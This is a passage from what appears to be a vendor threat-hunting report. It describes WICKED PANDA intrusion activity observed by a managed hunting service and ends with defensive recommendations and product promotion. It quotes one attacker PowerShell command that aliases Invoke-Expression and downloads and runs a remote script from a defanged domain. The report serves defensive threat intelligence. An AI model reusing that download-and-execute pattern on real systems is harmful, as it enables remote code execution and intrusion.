5
The customer
began patching
Examining the Counterfactual
Just one day later, OverWatch uncovered WICKED PANDA attempting the same
activity at another victim organization. This time, the actor executed a PowerShell
command that included the distinctive command alias “kaspersky” as shown below.
powershell set-alias -name kaspersky -value
Invoke-Expression;kaspersky(NewObject Net.WebClient).
DownloadString('https[:]//msettings.dnset[.]com/.dod/rund.txt')
OverWatch hunters notified the victim organization and then continued to track the
actor as they performed reconnaissance on the host and the Active Directory domain.
The actor proceeded to check the ARP cache for recent network communications
and then opened network connections to several hosts on port 137. The actor then
wrote a malicious DLL to disk and attempted to execute it. Finally, the actor killed the
process they were executing under and deleted the malicious DLL from disk.
WICKED PANDA later returned to drop a malicious .NET executable, identified as
WICKED PANDA’s AttachLoader, to load an encrypted Cobalt Strike payload into
memory. WICKED PANDA then used PowerShell for additional discovery activity,
enumerating running tasks, before subsequently attempting to exfiltrate this
information via DNS.
For these customers, OverWatch still has their back, continuously relaying detailed
insights on all discovered adversary activity so that the customer can undertake a
comprehensive response. However, leaning on a team of expert responders to deal
with threat hunting discoveries can be a significant force multiplier. These examples
show the power of leveraging Falcon Complete’s expertise and timely response to
take full advantage of OverWatch’s unrivaled ability to uncover adversary activity,
stopping intrusions on behalf of customers before the adversary can gain a foothold.



many avenues to gain access to victim environments — whether directly or by
leveraging access brokers. In addition, once they gain access, eCrime adversaries
are proving to be adept at quickly moving through victim networks, as evidenced by
short breakout times. (In more than a third of cases where OverWatch saw eCrime
adversaries break out, they were able to move laterally in under 30 minutes.)
Targeted intrusion adversaries are also showing no signs of slowing. The
telecommunications industry in particular has been hard hit, seeing intrusion
attempts more than double and accounting for 40% of all targeted intrusion activity
that OverWatch observed. The mass exploitation of Microsoft Exchange server
vulnerabilities also stood out as a low point, and as a timely reminder of both the
capabilities state-nexus adversaries have at their disposal and the ever-present threat
of new vulnerabilities being found and exploited.
Amidst all this, OverWatch remains vigilant, providing its customers with the
around-the-clock coverage needed to weather the ups and downs of the past
12 months and into the future. The defensive recommendations that follow draw on
the insights gleaned from threat hunters going head-to-head with adversaries every
day of the past year.
Recommendations
 Roll it out. OverWatch is seeing adversaries become increasingly adept at identifying
the blind spots in organizations’ security coverage. It is crucial that full endpoint
protection including NGAV and EDR is deployed across all endpoints. A significant
number of intrusion attempts observed by OverWatch originate from hosts without
Falcon sensor coverage, giving adversaries an opportunity to operate in the shadows.
Protecting your most valuable assets requires visibility across all of your assets.
Turn it on. It is crucial to have comprehensive security countermeasures and to
enable the prevention capabilities in the products you use. If security solutions are
in place, but not configured to provide the proper level of protection, you’re giving
the adversary a head start.
Be vigilant and ready to act. Adversaries are continuing to find new ways to
breach organizations and can move laterally in just minutes. Defenders must
hunt around-the-clock and must be ready to act within minutes. Top-quality
managed services such as OverWatch and Falcon Complete provide the expertise,
resources and coverage to augment your existing team.
2021 Threat Hunting Report 56
 Practice good hygiene. As a baseline, your organization should establish control
over the software running in your environment and eliminate unneeded software.
It is also crucial to ensure that your environment is kept up-to-date with the latest
patches.
 Protect your identity. Valid accounts provide adversaries with access that is
easy to use and difficult to discern from legitimate activity. The best defense
is to stop valid credentials from falling into the wrong hands in the first place.
Organizations should avoid the use of default accounts and establish and
enforce strong password policies, including the use of multifactor authentication.
It is also important not to store sensitive or credential-related information in
unencrypted files. To mitigate against the impacts of adversaries’ use of valid
accounts, defenders should employ the principle of least privilege and routinely
monitor authentication logs, account creation and changes in user privileges.
Pay close attention to remote access. The use of legitimate, non-native remote
access tools such as TeamViewer, AnyDesk or VNC (and its variants) by eCrime
actors is common. Defenders should restrict and audit the use of such tools in
their environment, even for authorized use cases. Many common exploit attempts
can be prevented by not exposing SMB and RDP ports to the internet. Any
externally accessible services should be closely monitored.

